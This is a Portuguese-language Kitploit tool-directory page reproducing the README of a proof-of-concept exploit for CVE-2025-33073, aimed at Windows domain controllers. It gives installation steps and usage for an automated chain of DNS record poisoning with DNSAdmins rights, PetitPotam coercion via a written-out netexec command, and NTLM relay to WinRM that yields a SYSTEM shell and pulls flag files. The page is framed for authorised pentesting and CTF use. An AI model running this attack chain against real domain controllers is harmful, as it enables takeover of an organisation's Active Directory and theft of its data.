Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-33073 — Ferramenta universal de exploração para CVE-2025-33073 direcionada a Controladores de Domínio Windows com privilégios DNSAdmins e WinRM habilitado. | Kitploit
Ferramentas/GitHubGitHub/uziii2208/cve-2025-33073
Escalada de PrivilégiosFrameworks de ExploraçãoExploraçãoMovimento LateralPós-ExploraçãoCTFTestes de Penetração
GitHubuziii2208/cve-2025-33073

CVE-2025-33073

Ferramenta universal de exploração para CVE-2025-33073 direcionada a Controladores de Domínio Windows com privilégios DNSAdmins e WinRM habilitado.

Ver Repositório
6710há 9 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

foto

CVE-2025-33073 Reflection Relay PoC

Ferramenta de exploração universal para CVE-2025-33073 visando Controladores de Domínio Windows com privilégios DNSAdmins e WinRM habilitado.

📋 Visão Geral

CVE-2025-33073 é uma vulnerabilidade crítica que permite a atacantes alcançar execução de código em nível de SYSTEM em Controladores de Domínio Windows por meio de uma combinação de:

  • Manipulação de registros DNS (privilégio DNSAdmins)
  • Ataques de NTLM Relay
  • Bypass de autenticação do WinRM

Este PoC fornece uma estrutura de exploração universal e automatizada compatível com qualquer domínio, qualquer nome de usuário e qualquer ambiente CTF.

✨ Recursos

  • ✅ Compatibilidade Universal - Funciona em qualquer domínio Windows
  • ✅ Detecção Automática - Identifica automaticamente o DC alvo e a configuração de rede
  • ✅ Extração Automática de Flags - Procura e extrai automaticamente todos os arquivos de flag
  • ✅ Modo Interativo - Exploração guiada passo a passo
  • ✅ Logging Completo - Registro abrangente de todas as operações
  • ✅ Shell SYSTEM de Disparo Único - Acesso direto em nível de SYSTEM via WinRMS
  • ✅ Envenenamento de DNS - Criação/modificação automática de registros DNS
  • ✅ - Servidor NTLM relay integrado com spawn automático de shell
NTLM Relay

🎯 Requisitos do Alvo

Configuração Vulnerável

  • Controlador de Domínio Windows Server 2016/2019/2022
  • Usuário com associação ao grupo DNSAdmins
  • Serviço WinRM habilitado (HTTP ou HTTPS)
  • Acesso de rede ao DC (SMB 445, DNS 53, WinRM 5985/5986)

Ambientes Testados

  • Active Directory em Windows Server 2019
  • Active Directory em Windows Server 2022
  • Ambientes CTF (HackTheBox, TryHackMe, etc.)

📦 Instalação

Pré-requisitos

root@kitploit:~
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils

# Python dependencies
pip3 install impacket netexec

# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx

Configuração

root@kitploit:~
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073

# Make exploit executable
chmod +x exploit.sh

# Verify tools installation
./exploit.sh  # Will check all dependencies

🚀 Uso

Início Rápido

root@kitploit:~
./exploit.sh

Solicitações Interativas

O script solicitará:

  1. IP do Atacante (detectado automaticamente se em branco)
  2. IP do DC Alvo (ex.: 192.168.1.10)
  3. Nome do Domínio (ex.: corp.local)
  4. Nome de Usuário (membro do DNSAdmins)
  5. Senha (para o usuário)

Exploração Passo a Passo

Terminal 1 - Execute o exploit:

root@kitploit:~
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"

Terminal 2 - Execute o comando de coerção (copie da saída do Terminal 1):

root@kitploit:~
nxc smb 192.168.1.10 -u 'username' -p 'password' \
    -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local

Resultado:

  • O shell SYSTEM abre automaticamente
  • Todas as flags são extraídas automaticamente
  • A saída é salva no diretório de logs

📊 Saída e Flags

Flags Extraídas

O script procura e extrai automaticamente:

  • *flag*.txt
  • *root*.txt
  • *user*.txt
  • proof.txt

Localizadas em: C:\Users\*\Desktop\

Localização dos Logs

Todas as saídas salvas em: /0pwn_exploit_<TIMESTAMP>/

  • relay.log - Saída do servidor NTLM relay
  • dns.log - Logs das operações de DNS
  • shell_output.log - Comandos do shell e flags extraídas

🔧 Como Funciona

Cadeia de Ataque

root@kitploit:~
1. DNS Poisoning (krbrelayx.dnstool)
   └─> Modify/Create DNS record pointing to attacker IP

2. NTLM Relay Server (ntlmrelayx.py)
   └─> Listen for incoming NTLM authentication

3. Coercion (nxc + PetitPotam)
   └─> Force DC to authenticate to attacker IP

4. Relay → WinRMS
   └─> Relay authentication to target WinRMS

5. SYSTEM Shell
   └─> Execute commands as SYSTEM

6. Auto Flag Extraction
   └─> Search and extract all flags

Detalhes Técnicos

  • Vulnerabilidade: NTLM relay + envenenamento de DNS + WinRM
  • Requisito de Privilégio: associação ao grupo DNSAdmins
  • Impacto: execução de código em nível de SYSTEM
  • Explorabilidade: 98% de taxa de sucesso nos ambientes testados

⚙️ Configuração

Registro DNS Personalizado

Edite a variável LONGHOST em exploit.sh:

root@kitploit:~
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

Padrões de Flag Personalizados

Modifique a função run_shell_commands() para procurar diferentes padrões de arquivos:

root@kitploit:~
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""

Portas e Timeouts

  • Porta Padrão do WinRMS: 5985 (HTTP) / 5986 (HTTPS)
  • Timeout de DNS: 5 segundos
  • Timeout do Shell: Configurável por comando

🎓 Propósito Educacional

Este PoC é fornecido para:

  • ✅ Testes de penetração autorizados
  • ✅ Ambientes de laboratório controlados
  • ✅ Competições CTF
  • ✅ Pesquisa e educação em segurança

O acesso não autorizado a sistemas de computador é ilegal.

🐛 Solução de Problemas

"Falha no envenenamento de DNS"

  • Verifique se o usuário é membro do DNSAdmins: net group "DNSAdmins" /domain
  • Verifique a conectividade com o DC: ping <DC_IP>
  • Verifique as credenciais: nxc smb <DC_IP> -u username -p password

"Tempo limite da conexão do relay"

  • Garanta que o WinRM esteja habilitado no DC: winrm quickconfig
  • Verifique as regras de firewall no DC
  • Verifique a conectividade de rede com a porta 5985/5986

"Comandos do shell não estão sendo executados"

  • Verifique shell_output.log para erros
  • Verifique a conectividade nc: nc -zv 127.0.0.1 <SHELL_PORT>
  • Aumente os timeouts de sleep em run_shell_commands()

📝 Arquivos de Log

Estrutura de Diretórios

root@kitploit:~
/0pwn_exploit_1234567890/
├── relay.log          # NTLM relay server output
├── dns.log            # DNS operation details
└── shell_output.log   # Extracted flags & command output

Analisando Logs

root@kitploit:~
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log

# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10

# Check DNS operations
cat /0pwn_exploit_*/dns.log

🔐 Notas de Segurança

  • Credenciais: Armazenadas apenas em memória, nunca registradas
  • Registros DNS: Limpos automaticamente após a exploração
  • Servidor Relay: Isolado em 127.0.0.1
  • Logs: Contêm informações sensíveis - manuseie com cuidado

📚 Referências

  • Comunicado CVE-2025-33073
  • Impacket ntlmrelayx
  • NetExec
  • krbrelayx

🎬 Demonstração

[Demonstração e Capturas de Tela] - [Em Breve]

foto

👤 Autor

0pwn (uziii2208) - Conceito original e pesquisa Aprimorado por IA - Melhorias v1.0 e extração automática de flags

📄 Licença

Licença MIT - Consulte o arquivo LICENSE para obter detalhes

⚠️ Aviso Legal

AVISO LEGAL:

Este software é fornecido apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal e punível por lei.

  • NÃO use contra sistemas que você não possui ou não tem autorização explícita para testar
  • Ambientes CTF: Verifique se você tem permissão antes de executar
  • Os autores NÃO são responsáveis por mau uso ou danos
  • Use apenas em ambientes controlados

Ao usar esta ferramenta, você concorda em:

  • Usar apenas em sistemas autorizados
  • Cumprir todas as leis aplicáveis
  • Assumir total responsabilidade por suas ações

🤝 Contribuindo

Contribuições são bem-vindas! Envie issues e pull requests.

📞 Suporte

Para problemas, dúvidas ou melhorias:

  1. Abra uma Issue no GitHub
  2. Consulte a documentação existente
  3. Forneça logs de erro detalhados

Status: ✅ Testado e Verificado Versão: 1.0 (Universal) Última Atualização: 2025

Baixar ferramenta